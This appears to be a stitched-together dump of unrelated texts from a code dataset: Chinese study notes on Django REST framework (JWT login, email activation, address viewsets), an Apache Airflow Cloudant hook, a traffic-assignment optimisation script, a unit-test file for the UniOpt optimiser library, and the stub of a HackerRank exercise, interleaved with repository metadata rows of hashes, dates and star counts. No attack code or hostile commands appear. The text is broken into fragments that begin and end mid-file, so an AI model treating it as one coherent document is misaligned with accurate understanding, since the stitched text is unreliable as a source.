返回数据,获得验证过的当前的用户,而这个在当前请求的 user 属性. request.user (不能直接拿到)
要在 类视图对象中,可以通过类视图对象获取属性request. (视频中老师源码看错误,应该看 APIView的dispatch方法的 self.request= request)
serializer_class = ?
为何要增加认证?
必须登录认证之后才能访问 get_object 方法
前端实现: jwt 规范的做法:请求头中实现
记住登录: localStorage ; 否则是 SessionStorage
token: 没有权限 status:403;或 过期
str.split() -> 列表,默认是以空格分割 JWT空格str
获取token值来判断用户身份的方式:
1.前端传递了token值; 2.我们在在配置中配置了 DEFAULT_AUTHENTICATION_CLASSES
----------------------------------------------------
PUT /users/<user_id>/email -> email
发送邮件的前置准备工作
SMTP 是发送邮件的服务器 vs IMAP POP3 是收邮件的服务器(其中IMAP支持交互操作,双向保存等,POP3只支持下载保存)
port 25
授权码
Django 发送邮件 : 1.配置(现成的模块);2.发送(django.core.mail 的 send_mail方法)
celery 发送操作
celery依赖django的配置,不要忽略
send_mail(subject, message, from_email, recipient_list,html_message=None) 参数:
链接: (token) 需要进行处理,防止用户激活的时候修改 激活链接
给 django自带的User模型类中仿照自带的一些方法,添加一个自定义的方法
自定义方法是添加token的方法,没太懂?
generate_verify_email_url 和 check_verify_email_token 这种对称的套路方法,都是是用 itsdangerous 包 TJWSSerializer
dumps. decode ; loads
序列化器的update方法中, save()的位置? 因为下面调用自定义方法的时候需要使用email,所以要先save
激活:
post or get 理解:
get没有请求体, delete可以有可以没有... 这里把token放在url?后面
--------------------------------------------------------
新版的django 的 ForeignKey(必须设置 on_delete 选项) 选项: related_name 类似flask的backref
自关联要点:
- 外键 'self' ; 这里其实可以写字符串或者类名(如果不是在同一py文件,那么要把app名加上:app名.类名); 但是'解释性'语言,所以可能会出错;通用的方法是; 都写字符串
- relate_name 多个外键,就可能存在问题
数据库迁移:
apps 新建的必须要注册到 dev的配置文件中,否则是没法进行数据库迁移的.
导入数据库文件方式--测试脚本实现:
1. <
2. # !
命令:mysql -h数据库ip地址 -u数据库用户名 -p 数据库名 < areas.sql 老师的课件是错误的
mysql -h127.0.0.1 --port=3306 -ubuyfree -p buyfree_mall < areas.sql (mysql数据库端口命令可以省略)
修改文件的执行权限 chmod +x import_areas_data_to_db.sh
执行命令导入数据: ./import_areas_data_to_db.sh
-------------------------------------------------------
实现省市区的接口:
所在地区:两个接口, 省是一打开就加载; 后面的市区可以共用一个接口
subs 属性,多
视图集: 视图方法的集合
视图集用: router方法来注册. DefaultRouter类() -> router -> router.register(prefix, viewset, verbose_name) -> urlpatterns += router.urls
缓存:
关闭分页处理: None
继承的顺序, Mixin 都写到前面 (强制记住)
------------------------------------------------------------
用户地址管理
分析: 用户地址数量不定(<=20) -> 不能放在 user 模型一起 -> 新建一个表
默认地址 -> 两种方法: 第一种-在address表中标记为default_address=True,修改麻烦,且容易造成一个用户有多个默认地址; 采取第二种-用户表中增加一个字段指向address
可以在 class Meta中设置 ordering = ['-update_time'] 来指明 每次查询的默认排序方式
关于视图集使用-- 解决现实问题: 地址栏有6个接口,分别用了各种methods,且他们的url资源都是关于 /addresses/ 的
get 查询 /addresses/ (/addresses/<pk>/ 不查询)
post 增加 /addresses/ (糊涂,增加这里哪有 <pk>, 这个id是数据库自动生成的,是不是傻 但是这里为何用复数呢?)
put 修改 /addresses/<pk>/
delete 删除 /addresses/<pk>/
put 设置默认地址 /addresses/<pk>/status/ (/users/<user_id>/addresses/<pk>/status/ 改成django风格,用户登录之后才会能修改,所以把前面去掉,为了统一到一个视图集中该操作)
put 设置地址的标题 /addresses/<pk>/title/
# url资源统一之后 符合 rest 风格, 才能更好的调用 视图集; 这个可以通过前面又一次不符合规范而没用的那个视图来验证
***********************************************
# 这里面导入的是 GenericViewSet, 而不是 GenericAPIView
这里如何理解? 并不容易
为何要继承 UpdateModelMixin ? 只是使用了它的校验? 它们映射 了 methods -> action
到底如何选择个性化字段?
映射到 对应的模型类 还要结合数据库表的字段
python manage.py shell 如何使用? 导包出现问题...
***********************************************
补充重要知识点:
关于外键字段: 一个外键字段,Django自动让其包含两个值: 模型类名.字段名 => 字段对象; 模型名.字段名_id => 字段对象的id(django 自动补充的); 这个两个结果在 查询和创建 的时候都会产生
'''
| 26.66443 | 129 | 0.699471 |
ace0953c452f5375b36724f211c92d9a86151c9b | 2,442 | py | Python | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 3 | 2015-08-25T13:56:44.000Z | 2020-03-21T10:26:58.000Z | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 37 | 2020-07-21T07:50:02.000Z | 2022-03-29T22:31:28.000Z | airflow/providers/cloudant/hooks/cloudant.py | mebelousov/airflow | d99833c9b5be9eafc0c7851343ee86b6c20aed40 | [
"Apache-2.0"
] | 4 | 2020-07-17T14:02:28.000Z | 2022-02-23T04:29:58.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Hook for Cloudant"""
from cloudant import cloudant
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
class CloudantHook(BaseHook):
"""
Interact with Cloudant. This class is a thin wrapper around the cloudant python library.
.. seealso:: the latest documentation `here <https://python-cloudant.readthedocs.io/en/latest/>`_.
:param cloudant_conn_id: The connection id to authenticate and get a session object from cloudant.
:type cloudant_conn_id: str
"""
def __init__(self, cloudant_conn_id='cloudant_default'):
super().__init__()
self.cloudant_conn_id = cloudant_conn_id
def get_conn(self):
"""
Opens a connection to the cloudant service and closes it automatically if used as context manager.
.. note::
In the connection form:
- 'host' equals the 'Account' (optional)
- 'login' equals the 'Username (or API Key)' (required)
- 'password' equals the 'Password' (required)
:return: an authorized cloudant session context manager object.
:rtype: cloudant
"""
conn = self.get_connection(self.cloudant_conn_id)
self._validate_connection(conn)
cloudant_session = cloudant(user=conn.login, passwd=conn.password, account=conn.host)
return cloudant_session
def _validate_connection(self, conn):
for conn_param in ['login', 'password']:
if not getattr(conn, conn_param):
raise AirflowException('missing connection parameter {conn_param}'.format(
conn_param=conn_param))
| 37.569231 | 106 | 0.703522 |
ace095a22bc87d26da05cdf764cf6765580cf88f | 5,956 | py | Python | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | test_scripts/MATLAB_test_weighted_sum.py | tapnx/tapnx | 5c1d21345ccd499939e35702526a4e2b7160ca4e | [
"MIT"
] | null | null | null | import pandas as pd
import tapnx as tapnx
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def travel_time(x,c,d,m):
a = d/m
#b = a*0.15
return a*(1+0.15*(x/c)**4)
def total_travel_time(x,c,d,m):
return np.sum(x*travel_time(x,c,d,m))
def speed(x,c,d,m):
a = d/m
#b = a*0.15
return m/(1+0.15*(x/c)**4)
def fuel_consumption(x,c,d,m):
s = speed(x,c,d,m)
return 0.0019*s**2 -0.2784*s + 17.337;
def total_fuel_consumption(x,c,d,m):
return np.sum((d/100)*x*fuel_consumption(x,c,d,m))
# ## system optimal
# def t(x,a,b,c,n,d,lam):
# return a*(1+b*(x/c)**n)
# def dtdx(x,a,b,c,n,d,lam):
# return a*b*n*(c**(-n))*(x**(n-1))
# def d2tdx2(x,a,b,c,n,d,lam):
# return (n-1)*a*b*n*(c**(-n))*(x**(n-2))
# def edge_func_so_np(x,a,b,c,n,d,lam):
# return t(x,a,b,c,n,d,lam) + x*dtdx(x,a,b,c,n,d,lam)
# def edge_func_so_derivative_np(x,a,b,c,n,d,lam):
# return 2*dtdx(x,a,b,c,n,d,lam) + x*d2tdx2(x,a,b,c,n,d,lam)
## distance system optimal
##
# need F = lam*D + lam*T
# D = d*x
# T = x*t(x)
# to solve via equilibrium use
# t_hat = F + x*F'
# F' = lam*D' + lam*T'
# = lam*d + lam*( t(x) + x*t'(x) )
# set max_d and max_tt to 1 for standard scale
# max_tt should be divided by the number of edges as the total travel time is a sum of all edges
# to maximise travel time, minimise -t, so lam = 0, max_tt =-1, results in a negative 1
def t(x,a,b,c,n,d,lam,max_d,max_tt):
return (lam/max_d)*d + ((1-lam)/max_tt)*a*(1+b*(x/c)**n)
def dtdx(x,a,b,c,n,d,lam,max_d,max_tt):
return ((1-lam)/max_tt)*a*b*n*(c**(-n))*(x**(n-1))
def d2tdx2(x,a,b,c,n,d,lam,max_d,max_tt):
return ((1-lam)/max_tt)*(n-1)*a*b*n*(c**(-n))*(x**(n-2))
def edge_func_dist_np(x,a,b,c,n,d,lam,max_d,max_tt):
return t(x,a,b,c,n,d,lam,max_d,max_tt) + x*dtdx(x,a,b,c,n,d,lam,max_d,max_tt)
def edge_func_dist_derivative_np(x,a,b,c,n,d,lam,max_d,max_tt):
return 2*dtdx(x,a,b,c,n,d,lam,max_d,max_tt) + x*d2tdx2(x,a,b,c,n,d,lam,max_d,max_tt)
filename = 'MATLAB_test'
# meta_data = tapnx.readTNTPMetadata('test_data/{}/{}_net.tntp'.format(filename,filename))
# df_edges = tapnx.TNTP_net_to_pandas('test_data/{}/{}_net.TNTP'.format(filename, filename), start_line=meta_data['END OF METADATA'])
#df_nodes = tapnx.TNTP_node_to_pandas('test_data/{}/{}_node.TNTP'.format(filename, filename))
# df_trips = tapnx.TNTP_trips_to_pandas('test_data/{}/{}_trips.TNTP'.format(filename, filename))
df_edges, df_nodes, df_trips = tapnx.graph_from_csv(
edges_filename = 'test_data/{}/{}_net.csv'.format(filename, filename),
trips_filename = 'test_data/{}/{}_trips.csv'.format(filename, filename)
)
G = tapnx.graph_from_edgedf(df_edges, edge_attr=True)
G = tapnx.trips_from_tripsdf(G, df_trips)
n = tapnx.get_np_array_from_edge_attribute(G, 'n')
b = tapnx.get_np_array_from_edge_attribute(G, 'b')
d = tapnx.get_np_array_from_edge_attribute(G, 'd')
#m = tapnx.get_np_array_from_edge_attribute(G, 'm')
c = tapnx.get_np_array_from_edge_attribute(G, 'c')
a = tapnx.get_np_array_from_edge_attribute(G, 'a')
#a = d/m
#print(a)
G.graph['no_edges'] = len(a)
G.graph['first_thru_node'] = 0
# G.graph['name'] = filename
# G.graph['no_zones'] = int(meta_data['NUMBER OF ZONES'])
# G.graph['no_nodes'] = int(meta_data['NUMBER OF NODES'])
# G.graph['first_thru_node'] = int(meta_data['FIRST THRU NODE'])
# G.graph['no_edges'] = int(meta_data['NUMBER OF LINKS'])
#G = tapnx.graph_positions_from_nodedf(G, df_nodes)
tol = 10**-6
max_iter = 100
#G, data = tapnx.gradient_projection(G,collect_data=True,aec_gap_tol=tol,max_iter=max_iter)
# plt.plot(data['AEC'], label='Gradient Projection 1')
# plt.plot(data['no_paths'], label='No. paths')
# #print(data_fw['x'][-1])
#print(data['x'][-1])
#print(np.sum(data['objective'][-1]))
# lam = 0
# G, data = tapnx.gradient_projection(
# G,
# collect_data=True,
# aec_gap_tol=tol,
# max_iter=max_iter)
# x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam))
# print(np.sum(x*t(x,a,b,c,n,d,lam)))
#plt.figure()
#plt.plot(data['AEC'], label='Gradient Projection 1')
#plt.yscale('log')
lam = 0
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
max_iter=max_iter,
d=False,
lam=lam)
x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
UE = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
lam = 0
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
max_iter=max_iter,
edge_func=edge_func_dist_np,
edge_func_derivative= edge_func_dist_derivative_np,
d=False,
lam=lam)
x = data['x'][-1]
#print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
SO = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
lam = 1
max_tt = 1
max_d = 1
G, data = tapnx.gradient_projection(
G,
collect_data=True,
aec_gap_tol=tol,
max_iter=max_iter,
edge_func=edge_func_dist_np,
edge_func_derivative= edge_func_dist_derivative_np,
d=True,
lam=lam)
x = data['x'][-1]
print(x)
#print(t(x,a,b,c,n,d,lam,max_d,max_tt))
WEI_SO = np.sum(x*t(x,a,b,c,n,d,lam,max_d,max_tt))
print(SO)
print(WEI_SO)
print(UE)
print(UE/SO)
# get max by maximising total travel time, min -xt(x)
# get max distance by maximising distance, min -dx
# tt_results = []
# d_results = []
# # lam up to 0.9999
# for lam in np.arange(0,1,0.01):
# print(lam)
# G, data = tapnx.gradient_projection(
# G,
# collect_data=True,
# aec_gap_tol=tol,
# max_iter=max_iter,
# edge_func=edge_func_dist_np,
# edge_func_derivative= edge_func_dist_derivative_np,
# d=True,
# lam=lam)
# x = data['x'][-1]
# #print(x)
# #print(t(x,a,b,c,n,d,lam))
# tt_results.append(np.sum(x*t(x,a,b,c,n,d,0)))
# d_results.append(np.sum(x*t(x,a,b,c,n,d,1)))
# print(tt_results)
# print(d_results)
# plt.figure()
# plt.plot(d_results, tt_results, 'o')
# plt.show()
#plt.figure()
#plt.plot(data['AEC'], label='Gradient Projection 1')
#plt.yscale('log')
| 25.78355 | 133 | 0.65413 |
ace0961ffe490c9240b92728ebf2a28e9fb2faed | 8,082 | py | Python | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | null | null | null | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | 1 | 2021-05-17T06:28:31.000Z | 2021-05-17T06:28:31.000Z | tests/tests.py | KOLANICH-ML/UniOpt.py | 9c87f9e19c4ba3fbeaf611c88d65ffb6d0bfbfae | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import sys
from pathlib import Path
import unittest
thisDir=Path(__file__).parent.absolute()
sys.path.append(str(thisDir.parent))
import numpy as np
from funcs import ackleyRosenbrockWithVariance
from UniOpt.core.Spec import *
from UniOpt.core.SpecNoIntegers import *
from UniOpt.core.SpecNoScalars import *
from UniOpt.core.SpecOnlyBoxes import SpecOnlyBoxes, ArraySpecOnlyBoxesNoIntegers, SpecOnlyBoxesNoIntegers, ArraySpecOnlyBoxes
from UniOpt.core.ArraySpec import *
from UniOpt.core.PointsStorage import *
from UniOpt.core.MetaSpec import MSpec
from UniOpt.backends.ecabc import BeeColonyGridSpec
from UniOpt.backends.pyshac import PySHACGridSpec
import UniOpt
from pprint import pprint
from collections import OrderedDict
import scipy.stats
specsTestGridSpec={
"x": HyperparamDefinition(float, scipy.stats.uniform(loc=0, scale=10)),
"w": HyperparamDefinition(int, scipy.stats.uniform(loc=0, scale=10)),
"y": HyperparamDefinition(float, scipy.stats.norm(loc=0, scale=10)), #discrete
"z": 3
}
masterInitVec=OrderedDict(( ("x", 0.7), ("w", 0.7), ("y", 0.6), ("z" , 3) ))
resultVec=OrderedDict(( ("x", masterInitVec["x"]), ("w", masterInitVec["w"]), ("y", specsTestGridSpec["y"].distribution.ppf(masterInitVec["y"])), ("z", 3) ))
classezToTest=("DummySpecNoScalarsCategoricalNoIntegers", "DummyArraySpecNoScalarsCategorical", "DummyArraySpecToIntegers", "DummyArraySpecNoScalarsDumbToIntegers", "DummyArraySpecNoScalarsCategoricalToIntegers", "DummyArraySpecNoScalarsCategoricalNoIntegers", "DummyArraySpecNoScalarsDumbNoIntegers", "DummyArraySpecNoScalarsDumb", "DummyArraySpecNoIntegers", "DummyArraySpec", "DummySpec", "DummySpecNoIntegers", "DummySpecNoScalarsCategoricalToIntegers")
classezToTest=[MSpec(clsName) for clsName in classezToTest]
classezToTest.extend((SpecOnlyBoxes, ArraySpecOnlyBoxesNoIntegers, SpecOnlyBoxesNoIntegers, ArraySpecOnlyBoxes))
class TestSpecsClasses(unittest.TestCase):
def assertIsSubclass(self, cls, superCls, msg=None):
if not issubclass(cls, superCls):
self.fail(self._formatMessage(msg, repr(cls)+' is not a subclass of '+repr(superCls)))
def assertForBasicClass(self, cls, basicCls):
if issubclass(cls, basicCls):
self.assertIsSubclass(cls.hyperparamsVectorType, basicCls.hyperparamsVectorType)
self.assertIsSubclass(cls.hyperparamsSpecType, basicCls.hyperparamsSpecType)
def assertions4ASpecClass(self, cls):
basicClasses=(
SpecNoIntegers,
SpecToIntegers,
SpecNoScalarsDumb,
SpecNoScalarsCategorical,
ArraySpec
)
for basicCls in basicClasses:
self.assertForBasicClass(cls, basicCls)
def testSpecsClasses(self):
for cls in classezToTest:
with self.subTest(specClass=cls):
#print(cls, [scls.__name__ for scls in cls.mro()])
#print(cls.hyperparamsVectorType, [scls.__name__ for scls in cls.hyperparamsVectorType.mro()[:-1]])
#print(cls.hyperparamsSpecType, [scls.__name__ for scls in cls.hyperparamsSpecType.mro()[:-1]])
self.assertions4ASpecClass(cls)
def testSpecsInheritedClasses(self):
for cls in classezToTest:
with self.subTest(specClass=cls):
class InheritedClass(cls):
pass
self.assertions4ASpecClass(cls)
class TestSpecs(unittest.TestCase):
def assertionsOnHyperparamsVector(self, cls, b):
self.assertEqual(b["x"], resultVec["x"])
self.assertIsInstance(b["x"], float)
if issubclass(cls, SpecNoIntegers):
self.assertEqual(b["w"], float2int(resultVec["w"]))
self.assertIsInstance(b["w"], int)
elif issubclass(cls, SpecToIntegers):
self.assertEqual(b["w"], int(resultVec["w"]))
self.assertIsInstance(b["w"], int)
else:
self.assertEqual(b["w"], resultVec["w"])
self.assertIsInstance(b["w"], float)
self.assertEqual(b["y"], resultVec["y"])
self.assertIsInstance(b["y"], float)
self.assertEqual(b["z"], resultVec["z"])
self.assertIsInstance(b["z"], int)
def generateTestHPVec(self, cls):
hpInitVec=type(masterInitVec)(masterInitVec)
if issubclass(cls, DummySpec) or hasattr(cls, "HyperparamsSpecsConverters") and hasattr(cls.HyperparamsSpecsConverters, specsTestGridSpec["y"].distribution.dist.name):
hpInitVec["y"] = resultVec["y"] #the result is generated by the optimizer itself
if issubclass(cls, SpecNoScalarsDumb):
del(hpInitVec["z"])
else:
# optimizer may transform a categorical int into float !!! DO NOT DELETE!
if issubclass(cls, SpecToIntegersBase):
hpInitVec["z"] = float(hpInitVec["z"]) # to test if conversion to int works
if issubclass(cls.hyperparamsVectorType, HyperparamArray):
hpInitVec = list(hpInitVec.values())
else:
hpInitVec = dict(hpInitVec)
return hpInitVec
def genericSpecTest(self, cls):
hpInitVec=self.generateTestHPVec(cls)
a = cls(specsTestGridSpec)
b = a.transformHyperparams(hpInitVec)
self.assertionsOnHyperparamsVector(cls, b)
return a, b
def testGenericSpecs(self):
for cls in classezToTest:
with self.subTest(specClass=cls):
self.genericSpecTest(cls)
def testBeeColonyGridSpec(self):
a=BeeColonyGridSpec(specsTestGridSpec)
b=a.transformHyperparams(self.generateTestHPVec(BeeColonyGridSpec))
self.assertEqual(b["x"], resultVec["x"])
self.assertEqual(b["y"], resultVec["y"])
self.assertEqual(b["z"], resultVec["z"])
self.assertEqual(a.spec["x"], ["float", (0, 10)])
self.assertEqual(a.spec["y"], ["float", uniformLimits])
self.assertEqual(a.spec["w"], ['int', (0.0, 10.0)])
def testPySHACSpecGridSpec(self):
import pyshac
a, b=self.genericSpecTest(PySHACGridSpec)
self.assertIsInstance(a.spec["x"], pyshac.config.hyperparameters.UniformContinuousHyperParameter)
self.assertIsInstance(a.spec["y"], pyshac.config.hyperparameters.NormalContinuousHyperParameter)
self.assertIsInstance(a.spec["w"], pyshac.config.hyperparameters.UniformContinuousHyperParameter)
self.assertIsInstance(a.spec["z"], pyshac.config.hyperparameters.DiscreteHyperParameter)
#self.assertionsOnHyperparamsVector()
optimizerTestGridSpec={
"x": HyperparamDefinition(float, scipy.stats.uniform(loc=0, scale=10)),
"y": HyperparamDefinition(int, scipy.stats.norm(loc=0, scale=10)), #discrete
#"y": HyperparamDefinition(int, scipy.stats.uniform(loc=0, scale=10)), #discrete
"z":3
}
from random import randint
testStoredPointsToTestInjection = [(p, ackleyRosenbrockWithVariance(p)) for p in ({"x":pp/5.,"y": randint(-30, 30)/3,"z":3} for pp in range(50))]
def prepareTestStor(cls):
stor=cls()
for p, loss in testStoredPointsToTestInjection:
stor.append(p, loss)
return stor
class OptimizersTests(unittest.TestCase):
def assertOnParams(self, params):
self.assertIsInstance(params["x"], possibleTypesRemap[optimizerTestGridSpec["x"].type])
self.assertGreaterEqual(params["x"], 0.)
self.assertLessEqual(params["x"], 10.)
self.assertIsInstance(params["y"], possibleTypesRemap[optimizerTestGridSpec["y"].type])
self.assertIsInstance(params["z"], possibleTypesRemap[type(optimizerTestGridSpec["z"])])
self.assertEqual(params["z"], optimizerTestGridSpec["z"])
def ackleyRosenbrockWithVarianceAndAssert(self, params):
self.assertOnParams(params)
return ackleyRosenbrockWithVariance(params)
#@unittest.skip
def testOptimizers(self):
func=self.ackleyRosenbrockWithVarianceAndAssert
results={}
for optimizer in UniOpt:
#for optimizer in (UniOpt.BayTuneGP, UniOpt.PySOT, UniOpt.RoBOGP):
print("optimizer: "+optimizer.__name__)
with self.subTest(optimizer=optimizer):
opt=optimizer(func, optimizerTestGridSpec, iters=100, jobs=1, pointsStorage=prepareTestStor(MemoryStorage))
res=opt()
results[optimizer]=(res, func(res))
results=OrderedDict(((k.__name__, v) for k,v in sorted(results.items(), key=lambda x: x[1][1][0])))
#if sys.version_info >= (3, 5):
# results=dict(results)
pprint(results)
@unittest.skip
def testOptimizer(self):
func=self.ackleyRosenbrockWithVarianceAndAssert
opt=UniOpt.GPyOpt(func, optimizerTestGridSpec, iters=100, jobs=1, pointsStorage=prepareTestStor(MemoryStorage))
res=opt()
self.assertOnParams(res)
if __name__ == '__main__':
unittest.main() | 39.043478 | 457 | 0.756372 |
ace0964626f010ec43f44cd74cf3018dd2f8fbd0 | 3,589 | py | Python | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | tests/func/strike_model_func_test.py | efomc/Tournament_game-russian_version | 7f2f8add907481c0e74b3a44f55a143234df8a83 | [
"MIT"
] | null | null | null | import pytest
from tournament_game import (
Character,
strike_model,
)
def test_strike_model_common():
fighter1 = Character("first")
fighter1.armor_curr = fighter1.armor
fighter2 = Character("second")
fighter2.armor_curr = fighter2.armor
for strike in range(1, 10):
strike_model(fighter1, fighter2, strike)
assert (
fighter1.armor_curr != fighter1.armor or fighter2.armor_curr != fighter1.armor
)
@pytest.mark.parametrize(
"numbers_of_fights, limit_of_strikes",
[
(10000, 150),
],
)
def test_strike_model_long(numbers_of_fights, limit_of_strikes):
for fight in range(numbers_of_fights):
fighter1 = Character("first")
fighter1.armor_curr = fighter1.armor
fighter2 = Character("second")
fighter2.armor_curr = fighter2.armor
strike_number = 0
while fighter1.armor_curr > 0 and fighter2.armor_curr > 0:
strike_number += 1
strike_model(fighter1, fighter2, strike_number)
assert strike_number <= limit_of_strikes
@pytest.mark.parametrize(
"numbers_of_fights, limit_of_strikes, percent_limit_strikes",
[
(10000, 10, 0.8),
],
)
def test_strike_model_percent_long(
numbers_of_fights, limit_of_strikes, percent_limit_strikes
):
numbers_of_good_long = 0
for fight in range(numbers_of_fights):
fighter1 = Character("first")
fighter1.armor_curr = fighter1.armor
fighter2 = Character("second")
fighter2.armor_curr = fighter2.armor
strike_number = 0
while fighter1.armor_curr > 0 and fighter2.armor_curr > 0:
strike_number += 1
strike_model(fighter1, fighter2, strike_number)
if strike_number <= limit_of_strikes:
numbers_of_good_long += 1
assert numbers_of_good_long / numbers_of_fights >= percent_limit_strikes
@pytest.mark.parametrize(
"numbers_of_fights",
[
50,
],
)
def test_strike_model_print_strike_description(numbers_of_fights, capfd, monkeypatch):
result_dict = {
"Цели достиг удар бойца first": False,
"Цели достиг удар бойца second": False,
"Они целуются! Но вот бьют снова!": False,
"Удар парирован!": False,
"Оба промахнулись. Бьют снова!": False,
}
expected_result_dict = {
"Цели достиг удар бойца first": True,
"Цели достиг удар бойца second": True,
"Они целуются! Но вот бьют снова!": True,
"Удар парирован!": True,
"Оба промахнулись. Бьют снова!": True,
}
for fight in range(numbers_of_fights):
fighter1 = Character("first")
fighter1.armor_curr = fighter1.armor
fighter2 = Character("second")
fighter2.armor_curr = fighter2.armor
strike_model(fighter1, fighter2, strike_number=1)
out = capfd.readouterr()[0]
for key in result_dict:
if key in out:
result_dict[key] = True
if not result_dict["Они целуются! Но вот бьют снова!"]:
monkeypatch.setattr(
"tournament_game.fight.hit_model", (lambda fighter1, fighter2, dice: "kiss")
)
fighter1 = Character("first")
fighter2 = Character("second")
strike_model(fighter1, fighter2, 1)
out = capfd.readouterr()[0]
if "Они целуются! Но вот бьют снова!" in out:
result_dict["Они целуются! Но вот бьют снова!"] = True
assert result_dict == expected_result_dict
| 33.858491 | 89 | 0.63221 |
ace09782112a4a9e5d0912827e5c3d9a8f1f66d7 | 614 | py | Python | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 136 | 2015-01-03T04:03:23.000Z | 2022-02-07T11:08:57.000Z | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 11 | 2017-02-09T20:05:04.000Z | 2021-01-24T22:25:59.000Z | tests/pyfilter/operations/conftest.py | Hengle/Houdini-Toolbox | a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3 | [
"MIT"
] | 26 | 2015-08-18T12:11:02.000Z | 2020-12-19T01:53:31.000Z | """Test setup."""
# =============================================================================
# IMPORTS
# =============================================================================
# Third Party
import pytest
# =============================================================================
# FIXTURES
# =============================================================================
@pytest.fixture
def patch_operation_logger(mocker):
"""Mock the log_filter_call logger."""
mock_logger = mocker.patch(
"ht.pyfilter.operations.operation._logger", autospec=True
)
yield mock_logger
| 26.695652 | 79 | 0.332248 |
ace0979d371ca9f896fb52d23f56afaeb1bdbbc7 | 2,973 | py | Python | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | rak_net/utils/reliability_tool.py | MCPI-Revival/big_test | aba8d4aa5aae2789a777c0c0d42374f3ee24eae3 | [
"MIT"
] | null | null | null | ################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 Podrum Studios #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
class reliability_tool:
@staticmethod
def reliable(reliability: int) -> bool:
if 2 <= reliability <= 7 and reliability != 5:
return True
return False
@staticmethod
def sequenced(reliability: int) -> bool:
if reliability == 1 or reliability == 4:
return True
return False
@staticmethod
def ordered(reliability: int) -> bool:
if 1 <= reliability <= 4 and reliability != 2 or reliability == 7:
return True
return False
| 59.46 | 80 | 0.40666 |
ace0994a61a746c78ade777dcab559dec1586d42 | 458 | py | Python | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | collections_counter.py | praveen-kumar/hackerrank_practice | daee2ced8424fa9c94dc8cb2d8e1bda4a4f80501 | [
"MIT"
] | null | null | null | from collections import Counter
# number of shoe pairs in the shop
# size of all the shoes
